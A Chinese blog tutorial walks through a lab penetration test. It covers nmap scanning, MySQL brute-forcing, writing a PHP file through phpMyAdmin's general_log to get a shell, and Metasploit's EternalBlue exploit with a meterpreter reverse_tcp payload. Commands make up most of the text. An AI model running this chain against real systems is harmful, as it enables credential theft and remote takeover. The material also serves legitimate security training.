Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。
nmap

一:利用nmap对目标进行信息收集

命令如下:

nmap -T4 -A 192.168.123.239

对目标主机扫描结果
从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。

二:对目标站点进行扫描

命令如下:

dirb http://192.168.123.239


通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。
在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。

三:利用nmap暴力破解mysql

命令如下:

nmap -p 3306 --script=mysql-brute.nse 192.168.123.239


如上,通过暴力破解,我们得到了账号和密码为root123456

四:尝试远程登录

命令如下:

mysql -h 192.168.123.239 -u root -p

成功登录数据库

利用phpMyAdmin拿shell

在前期的文章中提到过,我们先登录到phpMyAdin

执行下面的sql语句

SET GLOBAL GENERAL_log='on';
SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';
SELECT '<?php phpinfo(); ?>';

需要注意的是,一定要写对目标的站点根目录的绝对地址
执行完成后,会在更目录生成一个cmd.php文件,我们访问效果如下:

利用此种方式,便可成功拿shell。

五:利用nmap扫描目标主机漏洞

命令如下:

nmap -v  --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn

扫描结果如下:

可以看到,目标存在ms17-010 ms10-054 CVE-2017-0143等漏洞。

六:配合msfconsole那些系统权限

命令如下:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti


通过上诉示例,我们利用nmap从简单的信息收集到拿shell。一次完整的渗透测试就完成了。

Last modification:July 17th, 2020 at 10:18 pm
正在沿街乞讨中……